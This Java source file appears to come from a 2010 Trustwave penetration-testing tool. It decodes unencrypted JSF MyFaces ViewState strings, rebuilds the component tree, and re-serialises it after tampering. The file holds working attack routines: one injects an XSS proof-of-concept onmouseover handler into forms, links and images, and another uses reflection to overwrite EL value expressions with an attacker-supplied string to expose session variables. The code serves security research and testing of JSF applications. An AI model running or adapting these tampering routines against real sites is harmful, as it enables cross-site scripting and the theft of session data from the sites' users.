/******************************************************************************* * Copyright (c) 2010 Trustwave Holdings, Inc. *******************************************************************************/ package com.trustwave.deface.viewstate; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.io.ObjectInputStream; import java.io.StringWriter; import java.io.Writer; import java.lang.reflect.Field; import java.util.zip.GZIPInputStream; import javax.el.ELContext; import javax.el.ValueExpression; import javax.faces.FactoryFinder; import javax.faces.application.Application; import javax.faces.application.StateManager; import javax.faces.application.ViewHandler; import javax.faces.component.UIComponentBase; import javax.faces.component.UIViewRoot; import javax.faces.component.html.*; import javax.faces.context.ExternalContext; import javax.faces.context.FacesContext; import javax.faces.context.ResponseWriter; import javax.faces.lifecycle.Lifecycle; import javax.faces.render.RenderKit; import javax.faces.render.RenderKitFactory; import javax.faces.render.ResponseStateManager; import javax.servlet.ServletContext; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.commons.codec.binary.Base64InputStream; import org.apache.el.ValueExpressionImpl; import org.apache.jasper.el.JspValueExpression; import org.apache.myfaces.application.jsp.JspStateManagerImpl; import org.apache.myfaces.application.jsp.JspViewHandlerImpl; import org.apache.myfaces.config.FacesConfigurator; import org.apache.myfaces.renderkit.RenderKitFactoryImpl; import org.apache.myfaces.renderkit.html.HtmlResponseStateManager; import org.apache.myfaces.shared_impl.renderkit.html.HtmlResponseWriterImpl; import org.apache.myfaces.shared_impl.util.StateUtils; import org.apache.shale.test.mock.*; import com.trustwave.deface.utils.ObjectDumper; import com.trustwave.deface.utils.WriteBehindStateWriter; public class ViewStateWrapper { public static final String COMPRESS_STATE_IN_CLIENT = StateUtils.INIT_PREFIX + "COMPRESS_STATE_IN_CLIENT"; protected boolean compressViewState; protected final FacesContext facesContext; protected final ExternalContext externalContext; protected final ServletContext servletContext; protected final HttpServletRequest request; protected final HttpServletResponse response; protected final Lifecycle lifecycle; protected final UIViewRoot viewRoot; protected final Application application; protected final String rawViewState; protected final ViewHandler viewHandler; protected final StateManager stateManager; protected final StringWriter stateWriter; protected final HtmlResponseStateManager htmlResponseStateManager; public ViewStateWrapper(String rawViewState) { this.rawViewState = rawViewState; FactoryFinder.releaseFactories(); FactoryFinder.setFactory(FactoryFinder.APPLICATION_FACTORY, "org.apache.shale.test.mock.MockApplicationFactory"); FactoryFinder.setFactory(FactoryFinder.FACES_CONTEXT_FACTORY, "org.apache.shale.test.mock.MockFacesContextFactory"); FactoryFinder.setFactory(FactoryFinder.LIFECYCLE_FACTORY, "org.apache.shale.test.mock.MockLifecycleFactory"); FactoryFinder.setFactory(FactoryFinder.RENDER_KIT_FACTORY, "org.apache.shale.test.mock.MockRenderKitFactory"); checkForGzip(); servletContext = createMockServletContext(); request = createMockHttpServletRequest(); response = createMockHttpServletResponse(); application = createMockApplication(); externalContext = createMockExternalContext(); viewHandler = createViewHandler(); facesContext = createMockFacesContext(); stateManager = createStateManager(); application.setStateManager(stateManager); lifecycle = createMockLifecycle(); stateWriter = createWriter(); htmlResponseStateManager = createHtmlResponseStateManager(); viewRoot = restoreView(); facesContext.setViewRoot(viewRoot); } protected HtmlResponseStateManager createHtmlResponseStateManager() { return new HtmlResponseStateManager(); } protected UIViewRoot restoreView() { // RuntimeConfig runtimeConfig = RuntimeConfig.getCurrentInstance(externalContext); // ApplicationImpl.setInitializingRuntimeConfig(runtimeConfig); // 1.2.x // FacesContextImpl facesContext = new FacesContextImpl(servletContext, request, response); UIViewRoot root = viewHandler.restoreView(facesContext, getViewStateParamName()); return root; // return (UIViewRoot) StateUtils.reconstruct(rawViewState, externalContext); } public String getViewStateParamName() { return ResponseStateManager.VIEW_STATE_PARAM; } protected StateManager createStateManager() { return new JspStateManagerImpl(); } protected ViewHandler createViewHandler() { return new JspViewHandlerImpl(); } protected MockLifecycle createMockLifecycle() { return new MockLifecycle(); } protected MockFacesContext createMockFacesContext() { MockFacesContext mfc = new MockFacesContext(externalContext); ((MockFacesContext) mfc).setApplication(application); mfc.getApplication().setViewHandler(viewHandler); mfc.getApplication().setStateManager(stateManager); return mfc; } protected StringWriter createWriter() { RenderKitFactory renderFactory = (RenderKitFactory) FactoryFinder.getFactory(FactoryFinder.RENDER_KIT_FACTORY); FacesConfigurator configurator = new FacesConfigurator(externalContext); configurator.configure(); RenderKit renderKit = renderFactory.getRenderKit(facesContext, RenderKitFactory.HTML_BASIC_RENDER_KIT); // WriteBehindStateWriter wbsw = new WriteBehindStateWriter(facesContext, 100000); StringWriter sw = new StringWriter(); // HtmlResponseWriterImpl hrwi = new HtmlResponseWriterImpl(sw, null, null); ResponseWriter newWriter = renderKit.createResponseWriter(sw, "text/html", null); facesContext.setResponseWriter(newWriter); return sw; } @SuppressWarnings("unchecked") protected MockExternalContext createMockExternalContext() { MockExternalContext ec = new MockExternalContext(servletContext, request, response); ec.getRequestParameterMap().put(getViewStateParamName(), rawViewState);; return ec; } protected MockApplication createMockApplication() { return new MockApplication(); } protected MockHttpServletResponse createMockHttpServletResponse() { return new MockHttpServletResponse(); } protected MockHttpServletRequest createMockHttpServletRequest() { MockHttpServletRequest r = new MockHttpServletRequest(); r.setPathElements("", "", "", ""); r.addParameter(getViewStateParamName(), rawViewState); return r; } protected MockServletContext createMockServletContext() { MockServletContext msc = new MockServletContext(); ((MockServletContext) msc).addInitParameter(StateManager.STATE_SAVING_METHOD_PARAM_NAME, StateManager.STATE_SAVING_METHOD_CLIENT); ((MockServletContext) msc).addInitParameter(StateUtils.USE_ENCRYPTION, "false"); ((MockServletContext) msc).addInitParameter(COMPRESS_STATE_IN_CLIENT, String.valueOf(compressViewState)); return msc; } public String generateServerSideTextTree() { return ObjectDumper.dumpObject(viewRoot, false); } public String generateRawTextTree() { StringBuffer buffer = new StringBuffer(); ObjectInputStream ois; try { ois = initInputStream(this.rawViewState); try { long stateTime = ois.readLong(); buffer.append("State time stamp: " + stateTime + "\n\n"); } catch (IOException ioe) { // no state time } buffer.append("Structure object: \n" + ObjectDumper.dumpObject(ois.readObject(), false) + "\n\n"); buffer.append("State object: \n" + ObjectDumper.dumpObject(ois.readObject(), false)); } catch (IOException e) { buffer.append("Problem reading view state: " + e.getLocalizedMessage()); } catch (ClassNotFoundException e) { buffer.append("Class not found in view state: " + e.getLocalizedMessage()); } return buffer.toString(); } private ObjectInputStream initInputStream(String stateString) throws IOException { InputStream bis; if (compressViewState) { bis = new GZIPInputStream(new Base64InputStream(new ByteArrayInputStream(stateString.getBytes()))); } else { bis = new Base64InputStream(new ByteArrayInputStream(stateString.getBytes())); } return new ObjectInputStream(bis); } private void checkForGzip() { try { new GZIPInputStream(new Base64InputStream(new ByteArrayInputStream(rawViewState.getBytes()))); compressViewState = true; } catch (Exception ioe) { // assume input stream is not GZIP compressed) compressViewState = false; } } public void insertXSSPoC() { traverseView(viewRoot, new xsser()); } protected void traverseView(UIComponentBase component, TreeCrawlAction action) { for (UIComponentBase child : component.getChildren().toArray(new UIComponentBase[0])) { traverseView(child, action); action.handleNode(child); } } private class xsser implements TreeCrawlAction { public void handleNode(UIComponentBase child) { if (child instanceof HtmlForm) { ((HtmlForm) child).setOnmouseover("alert('hi')"); } else if (child instanceof HtmlCommandLink) { ((HtmlCommandLink) child).setOnmouseover("alert('hi')"); } else if (child instanceof HtmlGraphicImage) { ((HtmlGraphicImage) child).setOnmouseover("alert('hi')"); } else if (child instanceof HtmlPanelGrid) { ((HtmlPanelGrid) child).setOnmouseover("alert('hi')"); } else { System.err.println("Unknown type"); } } } private class sessionVarHijacker implements TreeCrawlAction { public sessionVarHijacker(String attack) { this.attack = "\n\n\n\n" + attack.replaceAll("\n", "\n\n\n") + "\n\n\n\n"; } private final String attack; public void handleNode(UIComponentBase child) { ValueExpression expression = child.getValueExpression("value"); if (expression != null) { if (expression instanceof JspValueExpression) { JspValueExpression jve = (JspValueExpression) expression; try { Field markField = JspValueExpression.class.getDeclaredField("mark"); markField.setAccessible(true); String mark = (String) markField.get(jve); markField.set(jve, mark.replaceFirst("'.*'", "'" + attack + "'")); Field targetField = JspValueExpression.class.getDeclaredField("target"); targetField.setAccessible(true); ValueExpressionImpl target = (ValueExpressionImpl) targetField.get(jve); Field exprField = ValueExpressionImpl.class.getDeclaredField("expr"); exprField.setAccessible(true); exprField.set(target, attack); } catch (SecurityException e) { System.err.println("Huh??? " + e.getLocalizedMessage()); e.printStackTrace(); System.exit(1); } catch (NoSuchFieldException e) { System.err.println("Huh??? " + e.getLocalizedMessage()); e.printStackTrace(); System.exit(1); } catch (IllegalArgumentException e) { System.err.println("Huh??? " + e.getLocalizedMessage()); e.printStackTrace(); System.exit(1); } catch (IllegalAccessException e) { System.err.println("Huh??? " + e.getLocalizedMessage()); e.printStackTrace(); System.exit(1); } } } } } public void insertSessionVarsPoC(String attack) { traverseView(viewRoot, new sessionVarHijacker(attack)); } public String serializeToString() { try { // viewHandler.writeState(facesContext); // viewHandler.renderView(facesContext, facesContext.getViewRoot()); StringWriter sw = new StringWriter(); ResponseWriter realWriter = facesContext.getResponseWriter(); facesContext.setResponseWriter(realWriter.cloneWithWriter(sw)); Object serializedView = stateManager.saveView(facesContext); stateManager.writeState(facesContext, serializedView); facesContext.setResponseWriter(realWriter); String state = sw.getBuffer().toString(); String state2 = state.replaceFirst("[\\x00-\\xff]*value=\"([\\x00-\\xff]+)\"[\\x00-\\xff]*", "$1").replaceAll("[\r\n]", ""); return state2; } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); } return ""; } }